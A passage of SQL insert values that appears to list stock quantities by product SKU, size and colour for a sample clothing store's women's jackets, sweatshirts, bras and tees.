(1279, 'default', 'WJ04-M-Red', 100.0000, 1),
(1280, 'default', 'WJ04-M-White', 100.0000, 1),
(1281, 'default', 'WJ04-L-Orange', 100.0000, 1),
(1282, 'default', 'WJ04-L-Red', 100.0000, 1),
(1283, 'default', 'WJ04-L-White', 100.0000, 1),
(1284, 'default', 'WJ04-XL-Orange', 100.0000, 1),
(1285, 'default', 'WJ04-XL-Red', 100.0000, 1),
(1286, 'default', 'WJ04-XL-White', 100.0000, 1),
(1287, 'default', 'WJ04', 0.0000, 1),
(1288, 'default', 'WJ05-XS-Brown', 100.0000, 1),
(1289, 'default', 'WJ05-XS-Green', 100.0000, 1),
(1290, 'default', 'WJ05-XS-Red', 100.0000, 1),
(1291, 'default', 'WJ05-S-Brown', 100.0000, 1),
(1292, 'default', 'WJ05-S-Green', 100.0000, 1),
(1293, 'default', 'WJ05-S-Red', 100.0000, 1),
(1294, 'default', 'WJ05-M-Brown', 100.0000, 1),
(1295, 'default', 'WJ05-M-Green', 100.0000, 1),
(1296, 'default', 'WJ05-M-Red', 100.0000, 1),
(1297, 'default', 'WJ05-L-Brown', 100.0000, 1),
(1298, 'default', 'WJ05-L-Green', 100.0000, 1),
(1299, 'default', 'WJ05-L-Red', 100.0000, 1),
(1300, 'default', 'WJ05-XL-Brown', 100.0000, 1),
(1301, 'default', 'WJ05-XL-Green', 100.0000, 1),
(1302, 'default', 'WJ05-XL-Red', 100.0000, 1),
(1303, 'default', 'WJ05', 0.0000, 1),
(1304, 'default', 'WJ07-XS-Orange', 100.0000, 1),
(1305, 'default', 'WJ07-XS-Purple', 100.0000, 1),
(1306, 'default', 'WJ07-XS-Red', 100.0000, 1),
(1307, 'default', 'WJ07-S-Orange', 100.0000, 1),
(1308, 'default', 'WJ07-S-Purple', 100.0000, 1),
(1309, 'default', 'WJ07-S-Red', 100.0000, 1),
(1310, 'default', 'WJ07-M-Orange', 100.0000, 1),
(1311, 'default', 'WJ07-M-Purple', 100.0000, 1),
(1312, 'default', 'WJ07-M-Red', 100.0000, 1),
(1313, 'default', 'WJ07-L-Orange', 100.0000, 1),
(1314, 'default', 'WJ07-L-Purple', 100.0000, 1),
(1315, 'default', 'WJ07-L-Red', 100.0000, 1),
(1316, 'default', 'WJ07-XL-Orange', 100.0000, 1),
(1317, 'default', 'WJ07-XL-Purple', 100.0000, 1),
(1318, 'default', 'WJ07-XL-Red', 100.0000, 1),
(1319, 'default', 'WJ07', 0.0000, 1),
(1320, 'default', 'WJ08-XS-Gray', 100.0000, 1),
(1321, 'default', 'WJ08-XS-Orange', 100.0000, 1),
(1322, 'default', 'WJ08-XS-Purple', 100.0000, 1),
(1323, 'default', 'WJ08-S-Gray', 100.0000, 1),
(1324, 'default', 'WJ08-S-Orange', 100.0000, 1),
(1325, 'default', 'WJ08-S-Purple', 100.0000, 1),
(1326, 'default', 'WJ08-M-Gray', 100.0000, 1),
(1327, 'default', 'WJ08-M-Orange', 100.0000, 1),
(1328, 'default', 'WJ08-M-Purple', 100.0000, 1),
(1329, 'default', 'WJ08-L-Gray', 100.0000, 1),
(1330, 'default', 'WJ08-L-Orange', 100.0000, 1),
(1331, 'default', 'WJ08-L-Purple', 100.0000, 1),
(1332, 'default', 'WJ08-XL-Gray', 100.0000, 1),
(1333, 'default', 'WJ08-XL-Orange', 100.0000, 1),
(1334, 'default', 'WJ08-XL-Purple', 100.0000, 1),
(1335, 'default', 'WJ08', 0.0000, 1),
(1336, 'default', 'WJ09-XS-Blue', 100.0000, 1),
(1337, 'default', 'WJ09-XS-Gray', 100.0000, 1),
(1338, 'default', 'WJ09-XS-Green', 100.0000, 1),
(1339, 'default', 'WJ09-S-Blue', 100.0000, 1),
(1340, 'default', 'WJ09-S-Gray', 100.0000, 1),
(1341, 'default', 'WJ09-S-Green', 100.0000, 1),
(1342, 'default', 'WJ09-M-Blue', 100.0000, 1),
(1343, 'default', 'WJ09-M-Gray', 100.0000, 1),
(1344, 'default', 'WJ09-M-Green', 100.0000, 1),
(1345, 'default', 'WJ09-L-Blue', 100.0000, 1),
(1346, 'default', 'WJ09-L-Gray', 100.0000, 1),
(1347, 'default', 'WJ09-L-Green', 100.0000, 1),
(1348, 'default', 'WJ09-XL-Blue', 100.0000, 1),
(1349, 'default', 'WJ09-XL-Gray', 100.0000, 1),
(1350, 'default', 'WJ09-XL-Green', 100.0000, 1),
(1351, 'default', 'WJ09', 0.0000, 1),
(1352, 'default', 'WJ10-XS-Black', 100.0000, 1),
(1353, 'default', 'WJ10-XS-Orange', 100.0000, 1),
(1354, 'default', 'WJ10-XS-Yellow', 100.0000, 1),
(1355, 'default', 'WJ10-S-Black', 100.0000, 1),
(1356, 'default', 'WJ10-S-Orange', 100.0000, 1),
(1357, 'default', 'WJ10-S-Yellow', 100.0000, 1),
(1358, 'default', 'WJ10-M-Black', 100.0000, 1),
(1359, 'default', 'WJ10-M-Orange', 100.0000, 1),
(1360, 'default', 'WJ10-M-Yellow', 100.0000, 1),
(1361, 'default', 'WJ10-L-Black', 100.0000, 1),
(1362, 'default', 'WJ10-L-Orange', 100.0000, 1),
(1363, 'default', 'WJ10-L-Yellow', 100.0000, 1),
(1364, 'default', 'WJ10-XL-Black', 100.0000, 1),
(1365, 'default', 'WJ10-XL-Orange', 100.0000, 1),
(1366, 'default', 'WJ10-XL-Yellow', 100.0000, 1),
(1367, 'default', 'WJ10', 0.0000, 1),
(1368, 'default', 'WJ11-XS-Black', 100.0000, 1),
(1369, 'default', 'WJ11-XS-Blue', 100.0000, 1),
(1370, 'default', 'WJ11-XS-Orange', 100.0000, 1),
(1371, 'default', 'WJ11-S-Black', 100.0000, 1),
(1372, 'default', 'WJ11-S-Blue', 100.0000, 1),
(1373, 'default', 'WJ11-S-Orange', 100.0000, 1),
(1374, 'default', 'WJ11-M-Black', 100.0000, 1),
(1375, 'default', 'WJ11-M-Blue', 100.0000, 1),
(1376, 'default', 'WJ11-M-Orange', 100.0000, 1),
(1377, 'default', 'WJ11-L-Black', 100.0000, 1),
(1378, 'default', 'WJ11-L-Blue', 100.0000, 1),
(1379, 'default', 'WJ11-L-Orange', 100.0000, 1),
(1380, 'default', 'WJ11-XL-Black', 100.0000, 1),
(1381, 'default', 'WJ11-XL-Blue', 100.0000, 1),
(1382, 'default', 'WJ11-XL-Orange', 100.0000, 1),
(1383, 'default', 'WJ11', 0.0000, 1),
(1384, 'default', 'WJ06-XS-Blue', 100.0000, 1),
(1385, 'default', 'WJ06-XS-Green', 100.0000, 1),
(1386, 'default', 'WJ06-XS-Purple', 100.0000, 1),
(1387, 'default', 'WJ06-S-Blue', 100.0000, 1),
(1388, 'default', 'WJ06-S-Green', 100.0000, 1),
(1389, 'default', 'WJ06-S-Purple', 100.0000, 1),
(1390, 'default', 'WJ06-M-Blue', 100.0000, 1),
(1391, 'default', 'WJ06-M-Green', 100.0000, 1),
(1392, 'default', 'WJ06-M-Purple', 100.0000, 1),
(1393, 'default', 'WJ06-L-Blue', 100.0000, 1),
(1394, 'default', 'WJ06-L-Green', 100.0000, 1),
(1395, 'default', 'WJ06-L-Purple', 100.0000, 1),
(1396, 'default', 'WJ06-XL-Blue', 100.0000, 1),
(1397, 'default', 'WJ06-XL-Green', 100.0000, 1),
(1398, 'default', 'WJ06-XL-Purple', 100.0000, 1),
(1399, 'default', 'WJ06', 0.0000, 1),
(1400, 'default', 'WJ12-XS-Black', 100.0000, 1),
(1401, 'default', 'WJ12-XS-Blue', 100.0000, 1),
(1402, 'default', 'WJ12-XS-Purple', 100.0000, 1),
(1403, 'default', 'WJ12-S-Black', 100.0000, 1),
(1404, 'default', 'WJ12-S-Blue', 100.0000, 1),
(1405, 'default', 'WJ12-S-Purple', 100.0000, 1),
(1406, 'default', 'WJ12-M-Black', 100.0000, 1),
(1407, 'default', 'WJ12-M-Blue', 100.0000, 1),
(1408, 'default', 'WJ12-M-Purple', 100.0000, 1),
(1409, 'default', 'WJ12-L-Black', 100.0000, 1),
(1410, 'default', 'WJ12-L-Blue', 100.0000, 1),
(1411, 'default', 'WJ12-L-Purple', 100.0000, 1),
(1412, 'default', 'WJ12-XL-Black', 100.0000, 1),
(1413, 'default', 'WJ12-XL-Blue', 100.0000, 1),
(1414, 'default', 'WJ12-XL-Purple', 100.0000, 1),
(1415, 'default', 'WJ12', 0.0000, 1),
(1416, 'default', 'WS02-XS-Blue', 100.0000, 1),
(1417, 'default', 'WS02-XS-Green', 100.0000, 1),
(1418, 'default', 'WS02-XS-Red', 100.0000, 1),
(1419, 'default', 'WS02-S-Blue', 100.0000, 1),
(1420, 'default', 'WS02-S-Green', 100.0000, 1),
(1421, 'default', 'WS02-S-Red', 100.0000, 1),
(1422, 'default', 'WS02-M-Blue', 100.0000, 1),
(1423, 'default', 'WS02-M-Green', 100.0000, 1),
(1424, 'default', 'WS02-M-Red', 100.0000, 1),
(1425, 'default', 'WS02-L-Blue', 100.0000, 1),
(1426, 'default', 'WS02-L-Green', 100.0000, 1),
(1427, 'default', 'WS02-L-Red', 100.0000, 1),
(1428, 'default', 'WS02-XL-Blue', 100.0000, 1),
(1429, 'default', 'WS02-XL-Green', 100.0000, 1),
(1430, 'default', 'WS02-XL-Red', 100.0000, 1),
(1431, 'default', 'WS02', 0.0000, 1),
(1432, 'default', 'WS03-XS-Blue', 100.0000, 1),
(1433, 'default', 'WS03-XS-Green', 100.0000, 1),
(1434, 'default', 'WS03-XS-Red', 99.0000, 1),
(1435, 'default', 'WS03-S-Blue', 100.0000, 1),
(1436, 'default', 'WS03-S-Green', 100.0000, 1),
(1437, 'default', 'WS03-S-Red', 100.0000, 1),
(1438, 'default', 'WS03-M-Blue', 100.0000, 1),
(1439, 'default', 'WS03-M-Green', 100.0000, 1),
(1440, 'default', 'WS03-M-Red', 100.0000, 1),
(1441, 'default', 'WS03-L-Blue', 100.0000, 1),
(1442, 'default', 'WS03-L-Green', 100.0000, 1),
(1443, 'default', 'WS03-L-Red', 100.0000, 1),
(1444, 'default', 'WS03-XL-Blue', 100.0000, 1),
(1445, 'default', 'WS03-XL-Green', 100.0000, 1),
(1446, 'default', 'WS03-XL-Red', 100.0000, 1),
(1447, 'default', 'WS03', 0.0000, 1),
(1448, 'default', 'WS04-XS-Blue', 100.0000, 1),
(1449, 'default', 'WS04-XS-Green', 100.0000, 1),
(1450, 'default', 'WS04-XS-Red', 100.0000, 1),
(1451, 'default', 'WS04-S-Blue', 100.0000, 1),
(1452, 'default', 'WS04-S-Green', 100.0000, 1),
(1453, 'default', 'WS04-S-Red', 100.0000, 1),
(1454, 'default', 'WS04-M-Blue', 100.0000, 1),
(1455, 'default', 'WS04-M-Green', 100.0000, 1),
(1456, 'default', 'WS04-M-Red', 100.0000, 1),
(1457, 'default', 'WS04-L-Blue', 100.0000, 1),
(1458, 'default', 'WS04-L-Green', 100.0000, 1),
(1459, 'default', 'WS04-L-Red', 100.0000, 1),
(1460, 'default', 'WS04-XL-Blue', 100.0000, 1),
(1461, 'default', 'WS04-XL-Green', 100.0000, 1),
(1462, 'default', 'WS04-XL-Red', 100.0000, 1),
(1463, 'default', 'WS04', 0.0000, 1),
(1464, 'default', 'WS06-XS-Gray', 100.0000, 1),
(1465, 'default', 'WS06-XS-Purple', 100.0000, 1),
(1466, 'default', 'WS06-XS-Red', 100.0000, 1),
(1467, 'default', 'WS06-S-Gray', 100.0000, 1),
(1468, 'default', 'WS06-S-Purple', 100.0000, 1),
(1469, 'default', 'WS06-S-Red', 100.0000, 1),
(1470, 'default', 'WS06-M-Gray', 100.0000, 1),
(1471, 'default', 'WS06-M-Purple', 100.0000, 1),
(1472, 'default', 'WS06-M-Red', 100.0000, 1),
(1473, 'default', 'WS06-L-Gray', 100.0000, 1),
(1474, 'default', 'WS06-L-Purple', 100.0000, 1),
(1475, 'default', 'WS06-L-Red', 100.0000, 1),
(1476, 'default', 'WS06-XL-Gray', 100.0000, 1),
(1477, 'default', 'WS06-XL-Purple', 100.0000, 1),
(1478, 'default', 'WS06-XL-Red', 100.0000, 1),
(1479, 'default', 'WS06', 0.0000, 1),
(1480, 'default', 'WS07-XS-Black', 100.0000, 1),
(1481, 'default', 'WS07-XS-White', 100.0000, 1),
(1482, 'default', 'WS07-XS-Yellow', 100.0000, 1),
(1483, 'default', 'WS07-S-Black', 100.0000, 1),
(1484, 'default', 'WS07-S-White', 100.0000, 1),
(1485, 'default', 'WS07-S-Yellow', 100.0000, 1),
(1486, 'default', 'WS07-M-Black', 100.0000, 1),
(1487, 'default', 'WS07-M-White', 100.0000, 1),
(1488, 'default', 'WS07-M-Yellow', 100.0000, 1),
(1489, 'default', 'WS07-L-Black', 100.0000, 1),
(1490, 'default', 'WS07-L-White', 100.0000, 1),
(1491, 'default', 'WS07-L-Yellow', 100.0000, 1),
(1492, 'default', 'WS07-XL-Black', 100.0000, 1),
(1493, 'default', 'WS07-XL-White', 100.0000, 1),
(1494, 'default', 'WS07-XL-Yellow', 100.0000, 1),
(1495, 'default', 'WS07', 0.0000, 1),
(1496, 'default', 'WS08-XS-Black', 100.0000, 1),
(1497, 'default', 'WS08-XS-Blue', 99.0000, 1),
(1498, 'default', 'WS08-XS-Red', 100.0000, 1),
(1499, 'default', 'WS08-S-Black', 100.0000, 1),
(1500, 'default', 'WS08-S-Blue', 100.0000, 1),
(1501, 'default', 'WS08-S-Red', 100.0000, 1),
(1502, 'default', 'WS08-M-Black', 100.0000, 1),
(1503, 'default', 'WS08-M-Blue', 100.0000, 1),
(1504, 'default', 'WS08-M-Red', 100.0000, 1),
(1505, 'default', 'WS08-L-Black', 100.0000, 1),
(1506, 'default', 'WS08-L-Blue', 100.0000, 1),
(1507, 'default', 'WS08-L-Red', 100.0000, 1),
(1508, 'default', 'WS08-XL-Black', 100.0000, 1),
(1509, 'default', 'WS08-XL-Blue', 100.0000, 1),
(1510, 'default', 'WS08-XL-Red', 100.0000, 1),
(1511, 'default', 'WS08', 0.0000, 1),
(1512, 'default', 'WS09-XS-Blue', 100.0000, 1),
(1513, 'default', 'WS09-XS-Red', 100.0000, 1),
(1514, 'default', 'WS09-XS-White', 100.0000, 1),
(1515, 'default', 'WS09-S-Blue', 100.0000, 1),
(1516, 'default', 'WS09-S-Red', 100.0000, 1),
(1517, 'default', 'WS09-S-White', 100.0000, 1),
(1518, 'default', 'WS09-M-Blue', 100.0000, 1),
(1519, 'default', 'WS09-M-Red', 100.0000, 1),
(1520, 'default', 'WS09-M-White', 100.0000, 1),
(1521, 'default', 'WS09-L-Blue', 100.0000, 1),
(1522, 'default', 'WS09-L-Red', 100.0000, 1),
(1523, 'default', 'WS09-L-White', 100.0000, 1),
(1524, 'default', 'WS09-XL-Blue', 100.0000, 1),
(1525, 'default', 'WS09-XL-Red', 100.0000, 1),
(1526, 'default', 'WS09-XL-White', 100.0000, 1),
(1527, 'default', 'WS09', 0.0000, 1),
(1528, 'default', 'WS10-XS-Green', 100.0000, 1),
(1529, 'default', 'WS10-XS-Red', 100.0000, 1),
(1530, 'default', 'WS10-XS-Yellow', 100.0000, 1),
(1531, 'default', 'WS10-S-Green', 100.0000, 1),
(1532, 'default', 'WS10-S-Red', 100.0000, 1),
(1533, 'default', 'WS10-S-Yellow', 100.0000, 1),
(1534, 'default', 'WS10-M-Green', 100.0000, 1),
(1535, 'default', 'WS10-M-Red', 100.0000, 1),
(1536, 'default', 'WS10-M-Yellow', 100.0000, 1),
(1537, 'default', 'WS10-L-Green', 100.0000, 1),
(1538, 'default', 'WS10-L-Red', 100.0000, 1),
(1539, 'default', 'WS10-L-Yellow', 100.0000, 1),
(1540, 'default', 'WS10-XL-Green', 100.0000, 1),
(1541, 'default', 'WS10-XL-Red', 100.0000, 1),
(1542, 'default', 'WS10-XL-Yellow', 100.0000, 1),
(1543, 'default', 'WS10', 0.0000, 1),
(1544, 'default', 'WS11-XS-Green', 100.0000, 1),
(1545, 'default', 'WS11-XS-Orange', 100.0000, 1),
(1546, 'default', 'WS11-XS-Yellow', 100.0000, 1),
(1547, 'default', 'WS11-S-Green', 100.0000, 1),
(1548, 'default', 'WS11-S-Orange', 100.0000, 1),
(1549, 'default', 'WS11-S-Yellow', 100.0000, 1),
(1550, 'default', 'WS11-M-Green', 100.0000, 1),
(1551, 'default', 'WS11-M-Orange', 100.0000, 1),
(1552, 'default', 'WS11-M-Yellow', 100.0000, 1),
(1553, 'default', 'WS11-L-Green', 100.0000, 1),
(1554, 'default', 'WS11-L-Orange', 100.0000, 1),
(1555, 'default', 'WS11-L-Yellow', 100.0000, 1),
(1556, 'default', 'WS11-XL-Green', 100.0000, 1),
(1557, 'default', 'WS11-XL-Orange', 100.0000, 1),
(1558, 'default', 'WS11-XL-Yellow', 100.0000, 1),
(1559, 'default', 'WS11', 0.0000, 1),
(1560, 'default', 'WS12-XS-Blue', 100.0000, 1),
(1561, 'default', 'WS12-XS-Orange', 100.0000, 1),
(1562, 'default', 'WS12-XS-Purple', 100.0000, 1),
(1563, 'default', 'WS12-S-Blue', 100.0000, 1),
(1564, 'default', 'WS12-S-Orange', 100.0000, 1),
(1565, 'default', 'WS12-S-Purple', 100.0000, 1),
(1566, 'default', 'WS12-M-Blue', 100.0000, 1),
(1567, 'default', 'WS12-M-Orange', 100.0000, 1),
(1568, 'default', 'WS12-M-Purple', 100.0000, 1),
(1569, 'default', 'WS12-L-Blue', 100.0000, 1),
(1570, 'default', 'WS12-L-Orange', 100.0000, 1),
(1571, 'default', 'WS12-L-Purple', 100.0000, 1),
(1572, 'default', 'WS12-XL-Blue', 100.0000, 1),
(1573, 'default', 'WS12-XL-Orange', 100.0000, 1),
(1574, 'default', 'WS12-XL-Purple', 100.0000, 1),
(1575, 'default', 'WS12', 0.0000, 1),
(1576, 'default', 'WS01-XS-Black', 100.0000, 1),
(1577, 'default', 'WS01-XS-Green', 100.0000, 1),
(1578, 'default', 'WS01-XS-Yellow', 100.0000, 1),
(1579, 'default', 'WS01-S-Black', 100.0000, 1),
(1580, 'default', 'WS01-S-Green', 100.0000, 1),
(1581, 'default', 'WS01-S-Yellow', 100.0000, 1),
(1582, 'default', 'WS01-M-Black', 100.0000, 1),
(1583, 'default', 'WS01-M-Green', 100.0000, 1),
(1584, 'default', 'WS01-M-Yellow', 100.0000, 1),
(1585, 'default', 'WS01-L-Black', 100.0000, 1),
(1586, 'default', 'WS01-L-Green', 100.0000, 1),
(1587, 'default', 'WS01-L-Yellow', 100.0000, 1),
(1588, 'default', 'WS01-XL-Black', 100.0000, 1),
(1589, 'default', 'WS01-XL-Green', 100.0000, 1),
(1590, 'default', 'WS01-XL-Yellow', 100.0000, 1),
(1591, 'default', 'WS01', 0.0000, 1),
(1592, 'default', 'WS05-XS-Black', 100.0000, 1),
(1593, 'default', 'WS05-XS-Orange', 100.0000, 1),
(1594, 'default', 'WS05-XS-Yellow', 100.0000, 1),
(1595, 'default', 'WS05-S-Black', 100.0000, 1),
(1596, 'default', 'WS05-S-Orange', 100.0000, 1),
(1597, 'default', 'WS05-S-Yellow', 100.0000, 1),
(1598, 'default', 'WS05-M-Black', 100.0000, 1),
(1599, 'default', 'WS05-M-Orange', 100.0000, 1),
(1600, 'default', 'WS05-M-Yellow', 100.0000, 1),
(1601, 'default', 'WS05-L-Black', 100.0000, 1),
(1602, 'default', 'WS05-L-Orange', 100.0000, 1),
(1603, 'default', 'WS05-L-Yellow', 100.0000, 1),
(1604, 'default', 'WS05-XL-Black', 100.0000, 1),
(1605, 'default', 'WS05-XL-Orange', 100.0000, 1),
(1606, 'default', 'WS05-XL-Yellow', 100.0000, 1),
(1607, 'default', 'WS05', 0.0000, 1),
(1608, 'default', 'WB01-XS-Black', 100.0000, 1),
(1609, 'default', 'WB01-XS-Gray', 100.0000, 1),
(1610, 'default', 'WB01-XS-Purple', 100.0000, 1),
(1611, 'default', 'WB01-S-Black', 100.0000, 1),
(1612, 'default', 'WB01-S-Gray', 100.0000, 1),
(1613, 'default', 'WB01-S-Purple', 100.0000, 1),
(1614, 'default', 'WB01-M-Black', 100.0000, 1),
(1615, 'default', 'WB01-M-Gray', 100.0000, 1),
(1616, 'default', 'WB01-M-Purple', 100.0000, 1),
(1617, 'default', 'WB01-L-Black', 100.0000, 1),
(1618, 'default', 'WB01-L-Gray', 100.0000, 1),
(1619, 'default', 'WB01-L-Purple', 100.0000, 1),
(1620, 'default', 'WB01-XL-Black', 100.0000, 1),
(1621, 'default', 'WB01-XL-Gray', 100.0000, 1),
(1622, 'default', 'WB01-XL-Purple', 100.0000, 1),
(1623, 'default', 'WB01', 0.0000, 1),
(1624, 'default', 'WB02-XS-Blue', 100.0000, 1),
(1625, 'default', 'WB02-XS-Orange', 100.0000, 1),
(1626, 'default', 'WB02-XS-Yellow', 100.0000, 1),
(1627, 'default', 'WB02-S-Blue', 100.0000, 1),
(1628, 'default', 'WB02-S-Orange', 100.0000, 1),
(1629, 'default', 'WB02-S-Yellow', 100.0000, 1),
(1630, 'default', 'WB02-M-Blue', 100.0000, 1),
(1631, 'default', 'WB02-M-Orange', 100.0000, 1),
(1632, 'default', 'WB02-M-Yellow', 100.0000, 1),
(1633, 'default', 'WB02-L-Blue', 100.0000, 1),
(1634, 'default', 'WB02-L-Orange', 100.0000, 1),
(1635, 'default', 'WB02-L-Yellow', 100.0000, 1),
(1636, 'default', 'WB02-XL-Blue', 100.0000, 1),
(1637, 'default', 'WB02-XL-Orange', 100.0000, 1),
(1638, 'default', 'WB02-XL-Yellow', 100.0000, 1),
(1639, 'default', 'WB02', 0.0000, 1),
(1640, 'default', 'WB03-XS-Green', 100.0000, 1),
(1641, 'default', 'WB03-XS-Red', 100.0000, 1),
(1642, 'default', 'WB03-XS-Yellow', 100.0000, 1),
(1643, 'default', 'WB03-S-Green', 100.0000, 1),
(1644, 'default', 'WB03-S-Red', 100.0000, 1),
(1645, 'default', 'WB03-S-Yellow', 100.0000, 1),
(1646, 'default', 'WB03-M-Green', 100.0000, 1),
(1647, 'default', 'WB03-M-Red', 100.0000, 1),
(1648, 'default', 'WB03-M-Yellow', 100.0000, 1),
(1649, 'default', 'WB03-L-Green', 100.0000, 1),
(1650, 'default', 'WB03-L-Red', 100.0000, 1),
(1651, 'default', 'WB03-L-Yellow', 100.0000, 1),
(1652, 'default', 'WB03-XL-Green', 100.0000, 1),
(1653, 'default', 'WB03-XL-Red', 100.0000, 1),
(1654, 'default', 'WB03-XL-Yellow', 100.0000, 1),
(1655, 'default', 'WB03', 0.0000, 1),
(1656, 'default', 'WB04-XS-Blue', 100.0000, 1),
(1657, 'default', 'WB04-XS-Purple', 100.0000, 1),
(1658, 'default', 'WB04-XS-Yellow', 100.0000, 1),
(1659, 'default', 'WB04-S-Blue', 100.0000, 1),
(1660, 'default', 'WB04-S-Purple', 100.0000, 1),
(1661, 'default', 'WB04-S-Yellow', 100.0000, 1),
(1662, 'default', 'WB04-M-Blue', 100.0000, 1),
(1663, 'default', 'WB04-M-Purple', 100.0000, 1),
(1664, 'default', 'WB04-M-Yellow', 100.0000, 1),
(1665, 'default', 'WB04-L-Blue', 100.0000, 1),
(1666, 'default', 'WB04-L-Purple', 100.0000, 1),
(1667, 'default', 'WB04-L-Yellow', 100.0000, 1),
(1668, 'default', 'WB04-XL-Blue', 100.0000, 1),
(1669, 'default', 'WB04-XL-Purple', 100.0000, 1),
(1670, 'default', 'WB04-XL-Yellow', 100.0000, 1),
(1671, 'default', 'WB04', 0.0000, 1),
(1672, 'default', 'WB05-XS-Black', 100.0000, 1),
(1673, 'default', 'WB05-XS-Orange', 100.0000, 1),
(1674, 'default', 'WB05-XS-Purple', 100.0000, 1),
(1675, 'default', 'WB05-S-Black', 100.0000, 1),
(1676, 'default', 'WB05-S-Orange', 100.0000, 1),
(1677, 'default', 'WB05-S-Purple', 100.0000, 1),
(1678, 'default', 'WB05-M-Black', 100.0000, 1),
(1679, 'default', 'WB05-M-Orange', 100.0000, 1),
(1680, 'default', 'WB05-M-Purple', 100.0000, 1),
(1681, 'default', 'WB05-L-Black', 100.0000, 1),
(1682, 'default', 'WB05-L-Orange', 100.0000, 1),
(1683, 'default', 'WB05-L-Purple', 100.0000, 1),
(1684, 'default', 'WB05-XL-Black', 100.0000, 1),
(1685, 'default', 'WB05-XL-Orange', 100.0000, 1),
(1686, 'default', 'WB05-XL-Purple', 100.0000, 1),
(1687, 'default', 'WB05', 0.0000, 1),
(1688, 'default', 'WT01-XS-Black', 100.0000, 1),
(1689, 'default', 'WT01-XS-Blue', 100.0000, 1),
(1690, 'default', 'WT01-XS-Orange', 100.0000, 1),
(1691, 'default', 'WT01-S-Black', 100.0000, 1),
(1692, 'default', 'WT01-S-Blue', 100.0000, 1),
(1693, 'default', 'WT01-S-Orange', 100.0000, 1),
(1694, 'default', 'WT01-M-Black', 100.0000, 1),
(1695, 'default', 'WT01-M-Blue', 100.0000, 1),
(1696, 'default', 'WT01-M-Orange', 100.0000, 1),
(1697, 'default', 'WT01-L-Black', 100.0000, 1),
(1698, 'default', 'WT01-L-Blue', 100.0000, 1),
(1699, 'default', 'WT01-L-Orange', 100.0000, 1),
(1700, 'default', 'WT01-XL-Black', 100.0000, 1),
(1701, 'default', 'WT01-XL-Blue', 100.0000, 1),
(1702, 'default', 'WT01-XL-Orange', 100.0000, 1),
(1703, 'default', 'WT01', 0.0000, 1),
(1704, 'default', 'WT02-XS-Green', 100.0000, 1),
(1705, 'default', 'WT02-XS-Orange', 100.0000, 1),
(1706, 'default', 'WT02-XS-Yellow', 100.0000, 1),
(1707, 'default', 'WT02-S-Green', 100.0000, 1),
(1708, 'default', 'WT02-S-Orange', 100.0000, 1),
(1709, 'default', 'WT02-S-Yellow', 100.0000, 1),
(1710, 'default', 'WT02-M-Green', 100.0000, 1),
(1711, 'default', 'WT02-M-Orange', 100.0000, 1),
(1712, 'default', 'WT02-M-Yellow', 100.0000, 1),
(1713, 'default', 'WT02-L-Green', 100.0000, 1),
(1714, 'default', 'WT02-L-Orange', 100.0000, 1),
(1715, 'default', 'WT02-L-Yellow', 100.0000, 1),
(1716, 'default', 'WT02-XL-Green', 100.0000, 1),
(1717, 'default', 'WT02-XL-Orange', 100.0000, 1),
(1718, 'default', 'WT02-XL-Yellow', 100.0000, 1),
(1719, 'default', 'WT02', 0.0000, 1),
(1720, 'default', 'WT03-XS-Orange', 100.0000, 1),
(1721, 'default', 'WT03-XS-Purple', 100.0000, 1),
(1722, 'default', 'WT03-XS-Red', 100.0000, 1),
(1723, 'default', 'WT03-S-Orange', 100.0000, 1),
(1724, 'default', 'WT03-S-Purple', 100.0000, 1),
(1725, 'default', 'WT03-S-Red', 100.0000, 1),
(1726, 'default', 'WT03-M-Orange', 100.0000, 1),
(1727, 'default', 'WT03-M-Purple', 100.0000, 1),
(1728, 'default', 'WT03-M-Red', 100.0000, 1),
(1729, 'default', 'WT03-L-Orange', 100.0000, 1),
(1730, 'default', 'WT03-L-Purple', 100.0000, 1),
(1731, 'default', 'WT03-L-Red', 100.0000, 1),
(1732, 'default', 'WT03-XL-Orange', 100.0000, 1),
(1733, 'default', 'WT03-XL-Purple', 100.0000, 1),
(1734, 'default', 'WT03-XL-Red', 100.0000, 1),
(1735, 'default', 'WT03', 0.0000, 1),
(1736, 'default', 'WT04-XS-Blue', 100.0000, 1),
(1737, 'default', 'WT04-XS-Purple', 100.0000, 1),
(1738, 'default', 'WT04-XS-Red', 100.0000, 1),
(1739, 'default', 'WT04-S-Blue', 100.0000, 1),
(1740, 'default', 'WT04-S-Purple', 100.0000, 1),
(1741, 'default', 'WT04-S-Red', 100.0000, 1),
(1742, 'default', 'WT04-M-Blue', 100.0000, 1),
(1743, 'default', 'WT04-M-Purple', 100.0000, 1),
(1744, 'default', 'WT04-M-Red', 100.0000, 1),
(1745, 'default', 'WT04-L-Blue', 100.0000, 1),
(1746, 'default', 'WT04-L-Purple', 100.0000, 1),
(1747, 'default', 'WT04-L-Red', 100.0000, 1),
(1748, 'default', 'WT04-XL-Blue', 100.0000, 1),
(1749, 'default', 'WT04-XL-Purple', 100.0000, 1),
(1750, 'default', 'WT04-XL-Red', 100.0000, 1),
(1751, 'default', 'WT04', 0.0000, 1),
(1752, 'default', 'WT05-XS-Orange', 100.0000, 1),
(1753, 'default', 'WT05-XS-Purple', 100.0000, 1),
(1754, 'default', 'WT05-XS-White', 100.0000, 1),
(1755, 'default', 'WT05-S-Orange', 100.0000, 1),
(1756, 'default', 'WT05-S-Purple', 100.0000, 1),
(1757, 'default', 'WT05-S-White', 100.0000, 1),
(1758, 'default', 'WT05-M-Orange', 100.0000, 1),
(1759, 'default', 'WT05-M-Purple', 100.0000, 1),
(1760, 'default', 'WT05-M-White', 100.0000, 1),
(1761, 'default', 'WT05-L-Orange', 100.0000, 1),
(1762, 'default', 'WT05-L-Purple', 100.0000, 1),
(1763, 'default', 'WT05-L-White', 100.0000, 1),
(1764, 'default', 'WT05-XL-Orange', 100.0000, 1),
(1765, 'default', 'WT05-XL-Purple', 100.0000, 1),
(1766, 'default', 'WT05-XL-White', 100.0000, 1),
(1767, 'default', 'WT05', 0.0000, 1),
(1768, 'default', 'WT06-XS-Blue', 100.0000, 1),
(1769, 'default', 'WT06-XS-Red', 100.0000, 1),
(1770, 'default', 'WT06-XS-Yellow', 100.0000, 1),
(1771, 'default', 'WT06-S-Blue', 100.0000, 1),
(1772, 'default', 'WT06-S-Red', 100.0000, 1),
(1773, 'default', 'WT06-S-Yellow', 100.0000, 1),
(1774, 'default', 'WT06-M-Blue', 100.0000, 1),
(1775, 'default', 'WT06-M-Red', 100.0000, 1),
(1776, 'default', 'WT06-M-Yellow', 100.0000, 1),
(1777, 'default', 'WT06-L-Blue', 100.0000, 1),
(1778, 'default', 'WT06-L-Red', 100.0000, 1),
